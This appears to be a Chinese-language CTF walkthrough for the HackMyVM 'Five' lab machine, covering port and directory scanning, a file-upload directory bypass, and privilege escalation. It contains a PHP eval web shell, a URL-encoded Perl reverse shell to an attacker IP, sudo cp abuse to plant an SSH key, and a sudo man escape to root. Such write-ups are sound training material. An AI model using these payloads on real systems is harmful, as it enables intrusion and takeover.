6.Five

靶机链接：https://hackmyvm.eu/machines/machine.php?vm=Five

作者：sml

难度：⭐️⭐️⭐️

知识点：文件上传目录绕过、SSH写公钥、SUDO提权(man、cp)

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sS 192.168.9.8  -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 12:48 CST
Nmap scan report for 192.168.9.8
Host is up (0.00038s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:93:A4:57 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster dir -u http://192.168.9.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.8/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 185] [--> http://192.168.9.8/uploads/]
/admin                (Status: 301) [Size: 185] [--> http://192.168.9.8/admin/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

POST /upload.php HTTP/1.1
Host: 192.168.9.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------170435815133440741313678117785
Content-Length: 509
Origin: http://192.168.9.8
Connection: keep-alive
Referer: http://192.168.9.8/upload.html
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Priority: u=0, i

-----------------------------170435815133440741313678117785
Content-Disposition: form-data; name="fileToUpload"; filename="1.php"
Content-Type: application/octet-stream

<?php
eval($\_POST["pass"]);

-----------------------------170435815133440741313678117785
Content-Disposition: form-data; name="directory"

/uploads
-----------------------------170435815133440741313678117785
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------170435815133440741313678117785--

pass=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.9.3%22%3B%24p%3D1122%3Bsocket%28S%2CPF\_INET%2CSOCK\_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr\_in%28%24p%2Cinet\_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

(remote) www-data@five:/var/www/html$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/man
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/more
(remote) www-data@five:/var/www/html$ sudo -l 
Matching Defaults entries for www-data on five:
    env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp

touch 1.txt
chmod a+rw 1.txt
sudo -u melisa cp /home/melisa/user.txt /tmp/1.txt

cat /etc/ssh/sshd\_config

cd /tmp
ssh-keygen //生成公私钥
sudo -u melisa cp id\_rsa.pub /home/melisa/.ssh/authorized\_keys //写入公钥
ssh -i id\_rsa -p 4444 melisa@127.0.0.1

melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
    env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

sudo man -P /usr/bin/less man
!/bin/bash

upload.php
<?php

$target\_dir = $\_POST["directory"];
$target\_file = $target\_dir . basename($\_FILES["fileToUpload"]["name"]);
$uploadOk = 1;

// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
  echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
  if (move\_uploaded\_file($\_FILES["fileToUpload"]["tmp\_name"], $target\_file)) {
    echo "The file ". htmlspecialchars( basename( $\_FILES["fileToUpload"]["name"])). " has been uploaded.";
  } else {
    echo "Sorry, there was an error uploading your file.";
  }
}
?>

location ~\* /uploads/.\*.php$
{
return 403;
}